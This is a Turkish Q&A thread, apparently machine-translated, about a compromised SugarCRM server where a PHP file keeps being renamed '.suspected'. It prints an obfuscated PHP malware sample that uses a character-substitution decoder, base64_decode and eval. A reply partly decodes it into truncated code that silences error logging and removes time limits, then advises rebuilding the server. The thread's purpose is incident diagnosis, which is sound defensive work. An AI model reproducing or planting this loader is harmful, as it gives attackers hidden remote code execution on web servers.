php dosyası otomatik olarak php.suspected olarak yeniden adlandırıldı

Question

Son 4 gündür, Üretim sunucumuzda (AWS EC2 örneği) SugarCRM olan tek bir siteye özgü garip bir sorunla karşı karşıyayız.

Sayı /home/site_folder/public_html/include/MassUpdate.php dosya otomatik yeniden adlandırıldı olan bu 2-3 olur

/home/site_folder/public_html/include/MassUpdate.php.suspected 3-4 saat arayla bir günde zaman. Bu sorun, yalnızca belirli bir site durumunda ortaya çıkar, hatta aynı sitenin çoğaltma kopyası için bile oluşmaz. Hatta bu dosyanın kodunu her iki siteden de kontrol ettim, aynı.

Googled ve bulduk, bu sorun çoğunlukla Wordpress siteleri için oluşur ve saldırı nedeniyle olabilir. Ama sunucumuzu saldırıya karşı kontrol ettik, hiç yok. Ayrıca sunucuda çalışan herhangi bir virüs/kötü amaçlı yazılım taraması yoktur.

Ne yapmalıyız?

Güncelleme: Biz egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ idam Ve örnek kodu aşağıdaki ile birkaç dosyaları olduğunu bulduk bu link geçmekte sonra birkaç şey buldum.

<?php 
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];} 
$ixo="base64_decode";return $ixo($ggy);} 
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'. 
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='; 
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f'); 
eval(flnftovr($s, $koicev));?> 

Bazı kötü amaçlı yazılımlar gibi görünüyor, kalıcı olarak kaldırmaya nasıl gidiyoruz?

Teşekkür

Answer 1

Biraz şaşırtma yapan ama it.The fonksiyon flnftovr bir dize ve argümanlar olarak dize alır de-Karartılmış ettik. Bu formülü

isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];} 

Daha sonra dizeye base64_decode preppends kullanarak yeni dize $ GGY oluşturur.

Dize $ s, dizi $ koicev. Daha sonra bu manipülasyonun sonucunu değerlendirir. Yani nihayetinde bir dize oluşturulan alır:

base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=) 

Peki gerçekte sunucu üzerinde çalıştırmak alır şudur: Bu yaratmadı ve Sitenizin saldırıya şüpheleniyorsanız

@ini_set('error_log', NULL); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@set_time_limit(0); 

if(isset($_SERVER) 
encode(serialize($res)); 
} 

, Bence sunucuyu silmenizi ve sunucunuzda hangi uygulamaları çalıştırıyorsanız yeni bir kurulum oluşturmanızı öneririz.